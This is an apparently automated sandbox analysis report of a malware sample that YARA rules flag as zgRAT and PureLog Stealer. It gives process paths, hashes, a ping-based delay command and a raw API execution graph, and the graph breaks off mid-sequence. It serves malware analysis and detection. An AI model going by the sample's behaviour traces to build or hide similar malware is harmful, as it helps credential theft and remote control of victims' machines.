                                                                                  Target ID:38
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Imagebase:0x620000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:39
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Imagebase:0x20000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:42
                                                                                  Start time:05:27:04
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:chcp 65001
                                                                                  Imagebase:0x7ff7a8480000
                                                                                  File size:14'848 bytes
                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:43
                                                                                  Start time:05:27:04
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Imagebase:0xcb0000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:44
                                                                                  Start time:05:27:04
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  Imagebase:0x600000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:47
                                                                                  Start time:05:27:05
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:ping -n 10 localhost
                                                                                  Imagebase:0x7ff641c70000
                                                                                  File size:22'528 bytes
                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:48
                                                                                  Start time:05:27:08
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff693ab0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:50
                                                                                  Start time:05:27:14
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\mshypercomponentSavesdll\agentFont.exe"
                                                                                  Imagebase:0xfa0000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:31.9%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:32
                                                                                    execution_graph 25123 7ff7b8f20997 25126 7ff7b8f21330 25123->25126 25154 7ff7b8f20ef0 25126->25154 25129 7ff7b8f213e7 25133 7ff7b8f21470 LoadLibraryExA 25129->25133 25135 7ff7b8f214f0 25129->25135 25137 7ff7b8f214dc 25129->25137 25138 7ff7b8f215dc 25129->25138 25130 7ff7b8f213be 25172 7ff7b8f21278 6 API calls _com_raise_error 25130->25172 25132 7ff7b8f213cb RaiseException 25148 7ff7b8f209d6 25132->25148 25136 7ff7b8f21487 GetLastError 25133->25136 25133->25137 25134 7ff7b8f215ba 25162 7ff7b8f20e04 25134->25162 25135->25134 25140 7ff7b8f21550 GetProcAddress 25135->25140 25141 7ff7b8f2149c 25136->25141 25142 7ff7b8f214b1 25136->25142 25137->25135 25143 7ff7b8f214e7 FreeLibrary 25137->25143 25175 7ff7b8f21278 6 API calls _com_raise_error 25138->25175 25140->25134 25146 7ff7b8f21565 GetLastError 25140->25146 25141->25137 25141->25142 25173 7ff7b8f21278 6 API calls _com_raise_error 25142->25173 25143->25135 25149 7ff7b8f2157a 25146->25149 25147 7ff7b8f214be RaiseException 25147->25148 25149->25134 25174 7ff7b8f21278 6 API calls _com_raise_error 25149->25174 25151 7ff7b8f2159c RaiseException 25152 7ff7b8f20ef0 _com_raise_error 6 API calls 25151->25152 25153 7ff7b8f215b6 25152->25153 25153->25134 25155 7ff7b8f20f7b 25154->25155 25156 7ff7b8f20f06 25154->25156 25155->25129 25155->25130 25156->25155 25176 7ff7b8f20fac 25156->25176 25159 7ff7b8f20f76 25160 7ff7b8f20fac _com_raise_error 3 API calls 25159->25160 25160->25155 25163 7ff7b8f20e89 25162->25163 25164 7ff7b8f20e2d 25162->25164 25166 7ff7b8f21180 _com_raise_error 3 API calls 25163->25166 25171 7ff7b8f20eb5 25163->25171 25164->25163 25165 7ff7b8f20fac _com_raise_error 3 API calls 25164->25165 25169 7ff7b8f20e40 25165->25169 25167 7ff7b8f20eb0 25166->25167 25168 7ff7b8f20fac _com_raise_error 3 API calls 25167->25168 25168->25171 25170 7ff7b8f21180 _com_raise_error 3 API calls 25169->25170 25170->25163 25171->25138 25172->25132 25173->25147 25174->25151 25175->25148 25177 7ff7b8f20fc7 25176->25177 25178 7ff7b8f20f18 25176->25178 25177->25178 25179 7ff7b8f20fcc GetModuleHandleW 25177->25179 25178->25159 25183 7ff7b8f21180 25178->25183 25180 7ff7b8f20fe1 25179->25180 25181 7ff7b8f20fe6 GetProcAddress 25179->25181 25180->25178 25181->25180 25182 7ff7b8f20ffb GetProcAddress 25181->25182 25182->25180 25185 7ff7b8f211b2 _com_raise_error 25183->25185 25184 7ff7b8f211ba 25184->25159 25185->25184 25188 7ff7b8f211fa VirtualProtect 25185->25188 25189 7ff7b8f2104c VirtualQuery GetSystemInfo 25185->25189 25188->25184 25189->25188 25190 7ff7b8f20c6a 25191 7ff7b8f21330 _com_raise_error 14 API calls 25190->25191 25192 7ff7b8f20ca9 25191->25192 25193 7ff7b8f2c7f8 25194 7ff7b8f2c807 memcpy_s 25193->25194 25195 7ff7b8f2c843 25193->25195 25194->25195 25196 7ff7b8f2c82a HeapAlloc 25194->25196 25200 7ff7b8f2aae0 25194->25200 25203 7ff7b8f2c5bc 15 API calls memcpy_s 25195->25203 25196->25194 25198 7ff7b8f2c841 25196->25198 25204 7ff7b8f2ab20 25200->25204 25203->25198 25209 7ff7b8f2e2b8 EnterCriticalSection 25204->25209 25210 7ff7b8f2266c 25235 7ff7b8f22250 25210->25235 25213 7ff7b8f227b8 25340 7ff7b8f22b90 7 API calls 2 library calls 25213->25340 25214 7ff7b8f22688 __scrt_acquire_startup_lock 25216 7ff7b8f227c2 25214->25216 25218 7ff7b8f226a6 25214->25218 25341 7ff7b8f22b90 7 API calls 2 library calls 25216->25341 25219 7ff7b8f226cb 25218->25219 25222 7ff7b8f226e8 __scrt_release_startup_lock 25218->25222 25243 7ff7b8f2bcb0 25218->25243 25220 7ff7b8f227cd abort 25223 7ff7b8f22751 25222->25223 25337 7ff7b8f2af70 35 API calls __GSHandlerCheck_EH 25222->25337 25247 7ff7b8f22cd8 25223->25247 25225 7ff7b8f22756 25250 7ff7b8f2bc40 25225->25250 25236 7ff7b8f22258 25235->25236 25237 7ff7b8f22264 __scrt_dllmain_crt_thread_attach 25236->25237 25238 7ff7b8f22271 25237->25238 25242 7ff7b8f2226d 25237->25242 25342 7ff7b8f2bb70 25238->25342 25242->25213 25242->25214 25244 7ff7b8f2bd0b 25243->25244 25245 7ff7b8f2bcec 25243->25245 25244->25222 25245->25244 25359 7ff7b8ef1140 25245->25359 25413 7ff7b8f35750 25247->25413 25415 7ff7b8f2f650 25250->25415 25252 7ff7b8f2bc4f 25254 7ff7b8f2275e 25252->25254 25419 7ff7b8f2f9e0 35 API calls _snwprintf 25252->25419 25255 7ff7b8f1ffd0 25254->25255 25421 7ff7b8f0d7f8 25255->25421 25259 7ff7b8f2003b 25504 7ff7b8f18ccc 25259->25504 25261 7ff7b8f20045 memcpy_s 25509 7ff7b8f19288 25261->25509 25263 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25266 7ff7b8f2067d 25263->25266 25264 7ff7b8f200d2 25265 7ff7b8f2020c GetCommandLineW 25264->25265 25314 7ff7b8f20677 25264->25314 25267 7ff7b8f2021e 25265->25267 25306 7ff7b8f203e4 25265->25306 25269 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25266->25269 25519 7ff7b8ef12c0 25267->25519 25271 7ff7b8f20683 25269->25271 25270 7ff7b8f203f2 25275 7ff7b8ef1fa8 31 API calls 25270->25275 25279 7ff7b8f20409 BuildCatchObjectHelperInternal 25270->25279 25641 7ff7b8f26834 25271->25641 25274 7ff7b8f20244 25529 7ff7b8f1c56c 25274->25529 25275->25279 25276 7ff7b8f20432 SetEnvironmentVariableW GetLocalTime 25580 7ff7b8f09d6c 25276->25580 25575 7ff7b8ef1fa8 25279->25575 25283 7ff7b8f2024d 25283->25266 25286 7ff7b8f2037e 25283->25286 25287 7ff7b8f20296 25283->25287 25291 7ff7b8ef12c0 33 API calls 25286->25291 25646 7ff7b8ef2830 33 API calls 25287->25646 25294 7ff7b8f203a4 25291->25294 25293 7ff7b8f2050c 25608 7ff7b8f1604c 25293->25608 25549 7ff7b8f1f520 25294->25549 25295 7ff7b8f202c3 25647 7ff7b8ef2d94 39 API calls _handle_error 25295->25647 25301 7ff7b8f202d5 25303 7ff7b8f2031c 25301->25303 25648 7ff7b8f19988 33 API calls 2 library calls 25301->25648 25302 7ff7b8f1604c 4 API calls 25304 7ff7b8f2051e DialogBoxParamW 25302->25304 25305 7ff7b8ef1fa8 31 API calls 25303->25305 25315 7ff7b8f2056a 25304->25315 25308 7ff7b8f20330 25305->25308 25562 7ff7b8f05758 25306->25562 25308->25271 25311 7ff7b8f20361 25308->25311 25309 7ff7b8f20672 25313 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25309->25313 25310 7ff7b8f202e9 25312 7ff7b8f1f520 35 API calls 25310->25312 25651 7ff7b8ef2c2c DisconnectNamedPipe CloseHandle 25311->25651 25317 7ff7b8f202f5 25312->25317 25313->25314 25314->25263 25318 7ff7b8f2057d Sleep 25315->25318 25319 7ff7b8f20583 25315->25319 25649 7ff7b8f0b2fc 99 API calls 25317->25649 25318->25319 25323 7ff7b8f20591 25319->25323 25611 7ff7b8f1973c 25319->25611 25320 7ff7b8f2037c 25320->25306 25322 7ff7b8f2030d 25650 7ff7b8f0b444 99 API calls 25322->25650 25326 7ff7b8f2059d DeleteObject 25323->25326 25327 7ff7b8f205bc 25326->25327 25328 7ff7b8f205b6 DeleteObject 25326->25328 25329 7ff7b8f205f1 25327->25329 25330 7ff7b8f20603 25327->25330 25328->25327 25652 7ff7b8f1f638 25329->25652 25637 7ff7b8f18d44 25330->25637 25337->25223 25340->25216 25341->25220 25343 7ff7b8f2fc6c 25342->25343 25344 7ff7b8f22276 25343->25344 25347 7ff7b8f2db20 25343->25347 25344->25242 25346 7ff7b8f24010 7 API calls 2 library calls 25344->25346 25346->25242 25358 7ff7b8f2e2b8 EnterCriticalSection 25347->25358 25364 7ff7b8ef8cfc 25359->25364 25363 7ff7b8f22445 25363->25245 25372 7ff7b8f04a2c 25364->25372 25366 7ff7b8ef8d13 25375 7ff7b8f0b0d0 25366->25375 25370 7ff7b8ef1150 25371 7ff7b8f22400 34 API calls 25370->25371 25371->25363 25381 7ff7b8f04a70 25372->25381 25390 7ff7b8ef13c4 25375->25390 25378 7ff7b8ef9554 25379 7ff7b8f04a70 2 API calls 25378->25379 25380 7ff7b8ef9562 25379->25380 25380->25370 25382 7ff7b8f04a86 memcpy_s 25381->25382 25385 7ff7b8f0e50c 25382->25385 25388 7ff7b8f0e4c0 GetCurrentProcess GetProcessAffinityMask 25385->25388 25389 7ff7b8f04a66 25388->25389 25389->25366 25391 7ff7b8ef13cd 25390->25391 25399 7ff7b8ef144a 25390->25399 25392 7ff7b8ef13ee 25391->25392 25393 7ff7b8ef145a 25391->25393 25396 7ff7b8ef13f7 memcpy_s 25392->25396 25400 7ff7b8f21c20 25392->25400 25410 7ff7b8ef2020 33 API calls std::_Xinvalid_argument 25393->25410 25409 7ff7b8ef1988 31 API calls _invalid_parameter_noinfo_noreturn 25396->25409 25399->25378 25403 7ff7b8f21c2b 25400->25403 25401 7ff7b8f21c44 25401->25396 25402 7ff7b8f2aae0 memcpy_s 2 API calls 25402->25403 25403->25401 25403->25402 25404 7ff7b8f21c4a 25403->25404 25405 7ff7b8f21c55 25404->25405 25411 7ff7b8f2287c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25404->25411 25412 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25405->25412 25409->25399 25411->25405 25414 7ff7b8f22cef GetStartupInfoW 25413->25414 25414->25225 25416 7ff7b8f2f65d 25415->25416 25417 7ff7b8f2f669 25415->25417 25420 7ff7b8f2f490 48 API calls 5 library calls 25416->25420 25417->25252 25419->25252 25420->25417 25658 7ff7b8f21ea0 25421->25658 25424 7ff7b8f0d84e GetProcAddress 25426 7ff7b8f0d87b GetProcAddress 25424->25426 25427 7ff7b8f0d863 25424->25427 25425 7ff7b8f0d8a3 25428 7ff7b8f0dd29 25425->25428 25700 7ff7b8f2a6a8 39 API calls _snwprintf 25425->25700 25426->25425 25431 7ff7b8f0d890 25426->25431 25427->25426 25430 7ff7b8f05758 34 API calls 25428->25430 25433 7ff7b8f0dd35 25430->25433 25431->25425 25432 7ff7b8f0dba2 25432->25428 25434 7ff7b8f0dbac 25432->25434 25660 7ff7b8f070b0 25433->25660 25436 7ff7b8f05758 34 API calls 25434->25436 25437 7ff7b8f0dbb8 CreateFileW 25436->25437 25438 7ff7b8f0dc01 SetFilePointer 25437->25438 25439 7ff7b8f0dd13 CloseHandle 25437->25439 25438->25439 25441 7ff7b8f0dc1a ReadFile 25438->25441 25442 7ff7b8ef1fa8 31 API calls 25439->25442 25441->25439 25443 7ff7b8f0dc42 25441->25443 25442->25428 25444 7ff7b8f0e0b2 25443->25444 25445 7ff7b8f0dc56 25443->25445 25725 7ff7b8f22074 8 API calls 25444->25725 25450 7ff7b8ef12c0 33 API calls 25445->25450 25447 7ff7b8f0dd6e CompareStringW 25465 7ff7b8f0dd49 25447->25465 25448 7ff7b8ef12c0 33 API calls 25448->25465 25449 7ff7b8f0e0b7 25455 7ff7b8f0dc96 25450->25455 25453 7ff7b8f0de94 25456 7ff7b8f0e06e 25453->25456 25457 7ff7b8f0dea2 25453->25457 25454 7ff7b8ef1fa8 31 API calls 25454->25465 25458 7ff7b8f0dcfa 25455->25458 25701 7ff7b8f0c968 25455->25701 25460 7ff7b8ef1fa8 31 API calls 25456->25460 25705 7ff7b8f07170 47 API calls 25457->25705 25462 7ff7b8ef1fa8 31 API calls 25458->25462 25464 7ff7b8f0e07a 25460->25464 25466 7ff7b8f0dd06 25462->25466 25463 7ff7b8f0deae 25467 7ff7b8f04518 9 API calls 25463->25467 25469 7ff7b8ef1fa8 31 API calls 25464->25469 25465->25447 25465->25448 25465->25454 25482 7ff7b8f0de11 25465->25482 25668 7ff7b8f04518 25465->25668 25673 7ff7b8f07334 25465->25673 25677 7ff7b8f02680 25465->25677 25470 7ff7b8ef1fa8 31 API calls 25466->25470 25471 7ff7b8f0deb3 25467->25471 25468 7ff7b8ef12c0 33 API calls 25468->25482 25472 7ff7b8f0e087 25469->25472 25470->25439 25473 7ff7b8f0df8d 25471->25473 25480 7ff7b8f0debe 25471->25480 25691 7ff7b8f21d70 25472->25691 25476 7ff7b8f0d2bc 48 API calls 25473->25476 25474 7ff7b8f07334 47 API calls 25474->25482 25478 7ff7b8f0dfee AllocConsole 25476->25478 25481 7ff7b8f0dff8 GetCurrentProcessId AttachConsole 25478->25481 25494 7ff7b8f0df57 25478->25494 25479 7ff7b8ef1fa8 31 API calls 25479->25482 25706 7ff7b8f0a008 25480->25706 25483 7ff7b8f0e012 25481->25483 25482->25453 25482->25468 25482->25474 25482->25479 25484 7ff7b8f02680 51 API calls 25482->25484 25489 7ff7b8f0e021 GetStdHandle WriteConsoleW Sleep FreeConsole 25483->25489 25484->25482 25486 7ff7b8f0e065 ExitProcess 25489->25494 25491 7ff7b8f0a008 58 API calls 25492 7ff7b8f0df48 25491->25492 25724 7ff7b8f0d440 33 API calls 25492->25724 25494->25486 25495 7ff7b8f055f8 GetCurrentDirectoryW 25496 7ff7b8f05696 25495->25496 25497 7ff7b8f05617 25495->25497 25496->25259 25498 7ff7b8ef13c4 33 API calls 25497->25498 25499 7ff7b8f05632 GetCurrentDirectoryW 25498->25499 25976 7ff7b8ef20c0 25499->25976 25501 7ff7b8f05658 25501->25496 25502 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25501->25502 25503 7ff7b8f056ad 25502->25503 25505 7ff7b8f0d5a4 25504->25505 25506 7ff7b8f18ce1 OleInitialize 25505->25506 25507 7ff7b8f18d07 25506->25507 25508 7ff7b8f18d2d SHGetMalloc 25507->25508 25508->25261 25510 7ff7b8f192bd 25509->25510 25517 7ff7b8f192c2 BuildCatchObjectHelperInternal 25509->25517 25511 7ff7b8ef1fa8 31 API calls 25510->25511 25511->25517 25512 7ff7b8f192f1 BuildCatchObjectHelperInternal 25514 7ff7b8f19320 BuildCatchObjectHelperInternal 25512->25514 25515 7ff7b8ef1fa8 31 API calls 25512->25515 25513 7ff7b8ef1fa8 31 API calls 25513->25512 25516 7ff7b8ef1fa8 31 API calls 25514->25516 25518 7ff7b8f1934f BuildCatchObjectHelperInternal 25514->25518 25515->25514 25516->25518 25517->25512 25517->25513 25518->25264 25521 7ff7b8ef12f4 25519->25521 25527 7ff7b8ef13ba 25519->25527 25523 7ff7b8ef13b5 25521->25523 25524 7ff7b8ef132a 25521->25524 25528 7ff7b8ef12fa BuildCatchObjectHelperInternal 25521->25528 25981 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25523->25981 25526 7ff7b8f21c20 4 API calls 25524->25526 25524->25528 25526->25528 25982 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 25527->25982 25528->25274 25530 7ff7b8f0c968 33 API calls 25529->25530 25545 7ff7b8f1c5c8 BuildCatchObjectHelperInternal 25530->25545 25531 7ff7b8f1c88a 25532 7ff7b8f1c8bc 25531->25532 25535 7ff7b8f1c8f0 25531->25535 25533 7ff7b8f21d70 _handle_error 8 API calls 25532->25533 25534 7ff7b8f1c8cd 25533->25534 25534->25283 25536 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25535->25536 25538 7ff7b8f1c8f6 25536->25538 25537 7ff7b8f0c968 33 API calls 25537->25545 25985 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 25538->25985 25539 7ff7b8f1c8eb 25984 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 25539->25984 25542 7ff7b8ef12c0 33 API calls 25542->25545 25543 7ff7b8f1c8fc 25986 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 25543->25986 25545->25531 25545->25535 25545->25537 25545->25538 25545->25539 25545->25542 25545->25543 25546 7ff7b8ef1fa8 31 API calls 25545->25546 25983 7ff7b8f0b444 99 API calls 25545->25983 25546->25545 25548 7ff7b8f1c902 25550 7ff7b8f1f54d 25549->25550 25551 7ff7b8f1f550 SetEnvironmentVariableW 25549->25551 25550->25551 25552 7ff7b8f0c968 33 API calls 25551->25552 25559 7ff7b8f1f58b 25552->25559 25553 7ff7b8f1f5da 25554 7ff7b8f1f611 25553->25554 25557 7ff7b8f1f632 25553->25557 25555 7ff7b8f21d70 _handle_error 8 API calls 25554->25555 25556 7ff7b8f1f622 25555->25556 25556->25306 25556->25309 25558 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25557->25558 25560 7ff7b8f1f637 25558->25560 25559->25553 25561 7ff7b8f1f5c4 SetEnvironmentVariableW 25559->25561 25561->25553 25563 7ff7b8ef13c4 33 API calls 25562->25563 25564 7ff7b8f0578d 25563->25564 25565 7ff7b8f05790 GetModuleFileNameW 25564->25565 25569 7ff7b8f057e0 25564->25569 25566 7ff7b8f057e2 25565->25566 25567 7ff7b8f057ab 25565->25567 25566->25569 25987 7ff7b8ef2164 25567->25987 25570 7ff7b8ef12c0 33 API calls 25569->25570 25572 7ff7b8f0580c 25570->25572 25571 7ff7b8f05844 25571->25270 25572->25571 25573 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25572->25573 25574 7ff7b8f05866 25573->25574 25576 7ff7b8ef1fbb 25575->25576 25577 7ff7b8ef1fe4 25575->25577 25576->25577 25578 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25576->25578 25577->25276 25579 7ff7b8ef2008 25578->25579 25581 7ff7b8f09d91 swprintf 25580->25581 25582 7ff7b8f29474 swprintf 46 API calls 25581->25582 25583 7ff7b8f09dad SetEnvironmentVariableW GetModuleHandleW LoadIconW 25582->25583 25584 7ff7b8f1a824 LoadBitmapW 25583->25584 25585 7ff7b8f1a84b 25584->25585 25588 7ff7b8f1a853 25584->25588 25992 7ff7b8f17ea8 FindResourceW 25585->25992 25587 7ff7b8f1a85b GetObjectW 25589 7ff7b8f1a870 25587->25589 25588->25587 25588->25589 26007 7ff7b8f17d20 25589->26007 25592 7ff7b8f1a8da 25603 7ff7b8f08ae0 25592->25603 25593 7ff7b8f1a8aa 26012 7ff7b8f17d88 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25593->26012 25595 7ff7b8f17ea8 11 API calls 25597 7ff7b8f1a896 25595->25597 25596 7ff7b8f1a8b3 26013 7ff7b8f17d50 25596->26013 25597->25593 25599 7ff7b8f1a89e DeleteObject 25597->25599 25599->25593 25602 7ff7b8f1a8cb DeleteObject 25602->25592 26022 7ff7b8f08b10 25603->26022 25605 7ff7b8f08aee 26089 7ff7b8f09644 GetModuleHandleW FindResourceW 25605->26089 25607 7ff7b8f08af6 25607->25293 25609 7ff7b8f21c20 4 API calls 25608->25609 25610 7ff7b8f16095 25609->25610 25610->25302 25612 7ff7b8f19782 25611->25612 25628 7ff7b8f197f1 25611->25628 25614 7ff7b8ef12c0 33 API calls 25612->25614 25613 7ff7b8ef1fa8 31 API calls 25615 7ff7b8f1980c 25613->25615 25616 7ff7b8f197af 25614->25616 25633 7ff7b8f1994c 25615->25633 25636 7ff7b8f1997f 25615->25636 26176 7ff7b8f07268 25615->26176 25619 7ff7b8f070b0 47 API calls 25616->25619 25618 7ff7b8f21d70 _handle_error 8 API calls 25621 7ff7b8f1995d 25618->25621 25622 7ff7b8f197c3 25619->25622 25620 7ff7b8f19867 26179 7ff7b8ef8a94 25620->26179 25621->25323 26187 7ff7b8f10b08 CompareStringW 25622->26187 25624 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25627 7ff7b8f19985 25624->25627 25628->25613 25628->25615 25633->25618 25636->25624 25638 7ff7b8f18d61 25637->25638 25639 7ff7b8f18d6a OleUninitialize 25638->25639 25640 7ff7b8f5e338 25639->25640 26190 7ff7b8f2676c 31 API calls 2 library calls 25641->26190 25643 7ff7b8f2684d 26191 7ff7b8f26864 16 API calls abort 25643->26191 25646->25295 25647->25301 25648->25310 25649->25322 25650->25303 25651->25320 25653 7ff7b8f1f68b WaitForSingleObject 25652->25653 25654 7ff7b8f1f69d CloseHandle 25653->25654 25655 7ff7b8f1f643 PeekMessageW 25653->25655 25654->25330 25656 7ff7b8f1f688 25655->25656 25657 7ff7b8f1f65f GetMessageW TranslateMessage DispatchMessageW 25655->25657 25656->25653 25657->25656 25659 7ff7b8f0d81c GetModuleHandleW 25658->25659 25659->25424 25659->25425 25661 7ff7b8f070c8 25660->25661 25662 7ff7b8f07113 25661->25662 25663 7ff7b8f070e1 25661->25663 25726 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 25662->25726 25665 7ff7b8ef12c0 33 API calls 25663->25665 25667 7ff7b8f07105 25665->25667 25666 7ff7b8f07118 25667->25465 25669 7ff7b8f0453c GetVersionExW 25668->25669 25670 7ff7b8f0456f 25668->25670 25669->25670 25671 7ff7b8f21d70 _handle_error 8 API calls 25670->25671 25672 7ff7b8f0459c 25671->25672 25672->25465 25674 7ff7b8f07349 25673->25674 25727 7ff7b8f07438 25674->25727 25676 7ff7b8f0736e 25676->25465 25678 7ff7b8f026ab GetFileAttributesW 25677->25678 25679 7ff7b8f026a8 25677->25679 25680 7ff7b8f026bc 25678->25680 25687 7ff7b8f0273c 25678->25687 25679->25678 25736 7ff7b8f05d18 25680->25736 25681 7ff7b8f21d70 _handle_error 8 API calls 25683 7ff7b8f02750 25681->25683 25683->25465 25685 7ff7b8f02703 25685->25687 25688 7ff7b8f02760 25685->25688 25686 7ff7b8f026ea GetFileAttributesW 25686->25685 25687->25681 25689 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25688->25689 25690 7ff7b8f02765 25689->25690 25692 7ff7b8f21d79 25691->25692 25693 7ff7b8f0e096 GetCurrentProcess SetUserObjectInformationW 25692->25693 25694 7ff7b8f21fa0 IsProcessorFeaturePresent 25692->25694 25693->25495 25695 7ff7b8f21fb8 25694->25695 25865 7ff7b8f22198 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25695->25865 25697 7ff7b8f21fcb 25866 7ff7b8f21f60 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25697->25866 25700->25432 25702 7ff7b8f0c99a 25701->25702 25703 7ff7b8f0c9cd 25702->25703 25704 7ff7b8ef1754 33 API calls 25702->25704 25703->25455 25704->25702 25705->25463 25718 7ff7b8f0a029 _snwprintf 25706->25718 25708 7ff7b8f0a078 25867 7ff7b8f0a244 25708->25867 25710 7ff7b8f21c20 4 API calls 25710->25718 25712 7ff7b8f21d70 _handle_error 8 API calls 25714 7ff7b8f0a1c3 25712->25714 25713 7ff7b8f0a244 48 API calls 25713->25718 25721 7ff7b8f0d2bc 25714->25721 25716 7ff7b8ef12c0 33 API calls 25716->25718 25718->25708 25718->25710 25718->25713 25718->25716 25719 7ff7b8f0a0b1 25718->25719 25720 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 25718->25720 25873 7ff7b8f09e70 33 API calls 25718->25873 25874 7ff7b8f224fc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 25718->25874 25875 7ff7b8f2243c 34 API calls 25718->25875 25876 7ff7b8f22490 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 25718->25876 25719->25712 25720->25718 25903 7ff7b8f0d098 25721->25903 25724->25494 25725->25449 25726->25666 25728 7ff7b8f075e5 25727->25728 25731 7ff7b8f0746a 25727->25731 25735 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 25728->25735 25730 7ff7b8f075ea 25733 7ff7b8f07484 BuildCatchObjectHelperInternal 25731->25733 25734 7ff7b8f04c2c 33 API calls 2 library calls 25731->25734 25733->25676 25734->25733 25735->25730 25737 